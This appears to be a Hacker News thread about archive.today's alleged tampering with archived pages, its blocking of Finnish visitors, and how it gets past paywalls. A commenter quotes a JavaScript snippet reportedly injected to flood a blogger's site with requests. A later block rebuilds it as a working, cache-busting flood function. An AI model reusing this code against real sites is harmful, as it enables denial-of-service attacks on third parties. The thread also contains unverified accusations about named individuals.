
There is a post describing the possibility of an organised campaign against archive.today [1] https://algustionesa.com/the-takedown-campaign-against-archi...

How does the tech behind archive.today work in detail? Is there any information out there that goes beyond the Google AI search reply or this HN thread [2]?

[1] https://algustionesa.com/the-takedown-campaign-against-archi... [2] https://news.ycombinator.com/item?id=42816427



If they're under an organised defamation campaign, they're not helping themselves by DDoSing someone else's blog and editing archived pages.


Is that, itself, true or disinformation?


They did edit archived pages. They temporarily did a find/replace on their archive to replace "Nora Puchreiner" (an alias the site operator uses) with "Jani Patokallio" (the name of the blogger who wrote about archive.today's owner). https://megalodon.jp/2026-0219-1634-10/https://archive.ph:44...

They also tampered with their archive for a few of the social media sites (Twitter, Instagram, Blogger) by changing the name of the signed in account to Jani Patokallio. https://megalodon.jp/2026-0220-0320-05/https://archive.is:44...

I think Wikipedia made the right decision: you can't trust an archival service for citations if, every time the sysop gets in a row, they tamper with their database.


This is so ‘early internet beef’ quaint. What next? Are they going to G-line each other?


It is utterly stupid when you consider that the host needed to replace their username with something in order to conceal their user accounts.



The Reddit CEO's life isn't in danger from people knowing who he is, to be fair.

I've not seen any evidence of them editing archived pages, BUT the DDoSing of gyrovague.com is true and still actively taking place. The author of that blog is Finnish, leading archive.today to ban all Finnish IPs by serving them endless captcha loops. After solving the first captcha, the page reloads and a javascript snippet appears in the source that attempts to spam gyrovague.com with repeated fetches.


> I've not seen any evidence of them editing archived pages

There is evidence of this in the article you're commenting on.


How do you know that? Did you see it (do you have a Finnish IP?)?


Yes, I have a Finnish IP, and just before I wrote that post I tested it to make sure it was still happening.

I assume it must be a blanket ban on Finnish IPs, as there have been comments about it on Reddit and none of my friends can get it to work either. 5 different ISPs were tried, so at the very least it seems to affect the majority of Finnish residential connections.


> just before I wrote that post I tested it to make sure it was still happening

That's awesome. I wish everyone made sure of their facts. Thanks.


This is quite an interesting question. For a single datapoint, I happen to have access to a VPN that's supposedly in Finland, and connecting through that didn't make any captcha loop appear on archive.today. The page worked fine.

Now it's obviously possible that my VPN was whitelisted somehow, or that the GeoIP of it is lying. This is just a singular datapoint.


As another datapoint with a Finnish IP from Mullvad VPN: CAPTCHA loop, and indeed after solving the first CAPTCHA this can be found in the page source:

setInterval(function(){fetch("https://gyrovague.com/tag/"+Math.random().toString(36).subst...",{ referrerPolicy:"no-referrer",mode:"no-cors" });},1400);
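The snippet is truncated in the source (`subst...`). A plausible full form, assuming the elided call is `substring(2)`, the usual idiom for turning `Math.random()` into a short base-36 slug, would look like this (a reconstruction for illustration, not the verbatim injected code):

```javascript
// Hypothetical reconstruction of the truncated snippet quoted above.
// Assumption: the elided call is substring(2), which strips the
// leading "0." from Math.random()'s base-36 representation.
function randomSlug() {
  return Math.random().toString(36).substring(2); // e.g. "k3j9x2m1q"
}

function startFlood(base, intervalMs) {
  // Every intervalMs, fetch a unique URL so each request bypasses caches
  // and hits the victim's origin server directly.
  return setInterval(function () {
    fetch(base + randomSlug(), {
      referrerPolicy: "no-referrer", // hide the archive page as the source
      mode: "no-cors",               // fire-and-forget cross-origin request
    });
  }, intervalMs);
}
```

The random path segment is what makes this nasty: every request looks like a fresh cache miss, so a CDN in front of the blog offers little protection.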


It’s also pretty common for VPNs to have exit nodes physically located in different countries to where they report those IPs (to GeoIP databases) as having originated from.


VPNs usually don't tell you much about residential experiences.


It was true and visible when reported, yeah.


I've also noticed archive.today injecting suspicious looking ads into archived pages that originally did not have ads.



it gives them a voice.


And that voice is practically shouting, "I AM UNTRUSTWORTHY".


that is not the worst thing to scream (especially after the FBI and Russian trail). Better to shout anything than to die in silence.


What kinda logic is that? If you don't want to die in silence, then shout something sensical. But if you're gonna shout garbage, just die in silence.


People say they want the old weird web back. Well there’s this.


The property of the medium: no one would repost or discuss "something sensical".


Or some shrewd sort of tactician.


archive.today works surprisingly well for me, often succeeding where archive.org fails.

archive.org also complies with takedown requests, so it's worth asking: could the organised campaign against archive.today have something to do with it preserving content that someone wants removed?


They preserve a lot of paywalled content so yeah I'm sure there's enough financial incentives to bother them :(


There was also the recent news about sites beginning to block the Internet Archive. Feels like we are gearing up for the next phase of the information war.


Was that written by AI? It sounds like AI, spends lots of time summarizing other posts, and has no listed author. My AI alarm is going off.


Ars was recently caught using AI to write articles, when the AI hallucinated details about a blogger getting harassed by someone using AI agents. The article quoted his blog, and all the quotes were nonsense.


Even if something is AI generated, the author, and the editor, should at least attempt to read back the article. English isn't my native language, so that obviously plays in, but very frequently I find that the articles I struggle to read are AI generated; they certainly have that AI feel.

It would be interesting to run the numbers, but I get the feeling that AI generated articles may have a higher LIX number. Authors are then less inclined to "fix" the text, because longer words make them seem smarter.


"Should" and "will" are completely different things. My kids "should" brush their teeth every night without me having to tell them. But they won't.


Sounds like you're suggesting an RFC for journalists and editors :-)


Yeah, wow. Definitely setting off my AI summary alarm.


Yeah nearly certainly.


A big fear of mine is something happening to archive.is

There is so much archived there; to lose it all would be a tragedy.


There are a number of blog posts like

owner-archive-today . blogspot . com

2 years old, like J.P.'s first post on AT


They are able to scrape paywalled sites at random, so I'm guessing a residential botnet is used.


It's funny that residential VPN botnets aren't uncommon now. "Free VPN" if you allow your computer/phone to be an exit point.


But how do they bypass the paywall? They can't just pretend to be Google by changing the user-agent, this wouldn't work all the time, as some websites also check IPs, and others don't even show the full content to Google.

They also cannot hijack data with a residential botnet or buy subscriptions themselves. Otherwise, the saved page would contain information about the logged-in user. It would be hard to remove this information, as the code changes all the time, and it would be easy for the website owner to add an invisible element that identifies the user. I suppose they could have different subscriptions and remove everything that isn't identical between the two, but that wouldn't be foolproof.
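The "diff two subscriptions" idea from the paragraph above can be sketched: fetch the same page under two different accounts and keep only what both renderings agree on. This is a rough line-level sketch (a real implementation would need DOM-level diffing, and as the comment notes it isn't foolproof against deliberately planted identifiers):

```javascript
// Sketch: strip personalised content by intersecting two renderings
// of the same page fetched under two different accounts. Anything
// that differs between them (usernames, account ids, tracking
// beacons) is assumed personal and gets redacted.
function stripPersonalised(pageA, pageB) {
  const a = pageA.split("\n");
  const b = pageB.split("\n");
  const out = [];
  for (let i = 0; i < Math.min(a.length, b.length); i++) {
    // Keep lines both accounts saw identically; redact the rest.
    out.push(a[i] === b[i] ? a[i] : "<!-- redacted -->");
  }
  return out.join("\n");
}
```

The weakness the comment points at is structural: a publisher can embed the subscriber identity in ways that survive a naive diff, e.g. steganographically in whitespace or in content ordering.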


On the network layer, I don't know. But on the WWW layer, archive.today operates accounts that are used to log into websites when they are snapshotted. IIRC, archive.today manipulates the snapshots to hide the fact that someone is logged in, but sometimes fails miserably:

https://megalodon.jp/2026-0221-0304-51/https://d914s229qk4kj...

https://archive.is/Y7z4E

The second shows volth's Github notifications. Volth was a major nix-pkgs contributor, but his Github account disappeared.

https://github.com/orgs/community/discussions/58164


There are some pretty robust browser addons for bypassing article paywalls, notably https://gitflic.ru/project/magnolia1234/bypass-paywalls-fire...

This particular addon is blocked on most western git servers, but can still be installed from Russian git servers. It includes custom paywall-bypassing code for pretty much every news website you could reasonably imagine, or at least those sites that use conditional paywalls (paywalls for humans, no paywalls for big search engines). It won't work on sites like Substack that use proper authenticated content pages, but these sorts of pages don't get picked up by archive.today either.

My guess would be that archive.today loads such an addon with its headless browser and thus bypasses paywalls that way. Even if publishers find a way to detect headless browsers, crawlers can also be written to operate with traditional web browsers where lots of anti-paywall addons can be installed.


Wow, did not know about the regional blocking of git servers! Makes me wonder what else is kept from the western audience, and for what reason this blocking is happening.

Thanks for sketching out their approach and for the URI.


But don't news websites check for ip addresses to make sure they really are from Google bots?


Most of them don’t check the IP, it would seem. Google acquires new IPs all the time, plus there are a lot of other search systems that news publishers don’t want to accidentally miss out on. It’s mostly just client side JS hiding the content after a time delay or other techniques like that. I think the proportion of the population using these addons is so low, it would cost more in lost SEO for news publishers to restrict crawling to a subset of IPs.
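The "conditional paywall" pattern described above can be sketched in a few lines: the full article ships in the HTML, and client-side code decides whether to hide it, sparing anything whose User-Agent looks like a search-engine crawler. The crawler list here is a made-up illustration; the point is that a UA string check with no IP verification is trivially spoofed by an addon or archiver:

```javascript
// Sketch of a UA-only paywall gate, as described in the comment above.
// The crawler patterns are illustrative assumptions.
const CRAWLER_UAS = [/Googlebot/i, /bingbot/i, /DuckDuckBot/i];

function shouldPaywall(userAgent) {
  // Hide the article unless the visitor claims to be a known crawler.
  // Nothing stops a regular client from sending the same string.
  return !CRAWLER_UAS.some((re) => re.test(userAgent));
}
```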


I use this add on. It does get blocked sometimes but they update the rules every couple of weeks.


I thought saved pages sometimes do contain users' IP's?

https://www.reddit.com/r/Advice/comments/5rbla4/comment/dd5x...

The way I (loosely) understand it, when you archive a page they send your IP in the X-Forwarded-For header. Some paywall operators render that into the page content served up, which then causes it to be visible to anyone who clicks your archived link and Views Source.
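That leak path can be sketched server-side: the archiver forwards the submitter's IP in `X-Forwarded-For`, and an origin server that naively renders the header into the page bakes it into the snapshot. The rendering function here is an assumption for illustration, not any particular publisher's code:

```javascript
// Sketch: how a submitter's IP can end up in archived markup.
// Some origins echo X-Forwarded-For into the served HTML; whatever
// they render is exactly what the archive snapshots and what
// "View Source" on the archived copy later reveals.
function renderPage(headers, article) {
  const clientIp = headers["x-forwarded-for"] || "unknown";
  return `<html><body><!-- served to ${clientIp} -->${article}</body></html>`;
}
```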


> But how do they bypass the paywall?

I’m guessing by using a residential botnet and the existing credentials of unknowing "victims", by automating their browsers.

> Otherwise, the saved page would contain information about the logged-in user.

If you read this article, there's plenty of evidence they are manipulating the scraped data.

But I’m just speculating here…


But in the article they talk about manipulating users' devices to do a DDoS, not scrape websites. And the user going to the archive website is probably not gonna have a subscription, and anyway I'm not sure that simply visiting archive.today will make it able to exfiltrate much information from any other third party website, since cookies will not be shared.

I guess if they can control a residential botnet more extensively they would be able to do that, but it would still be very difficult to remove login information from the page, the fact that they manipulated the scraped data for totally unrelated reasons a few times proves nothing in my opinion.


They do remove the login information for their own accounts (e.g. the one they use for the LinkedIn sign-up wall). Their implementation is not perfect, though, which is how the aliases were leaked in the first place.



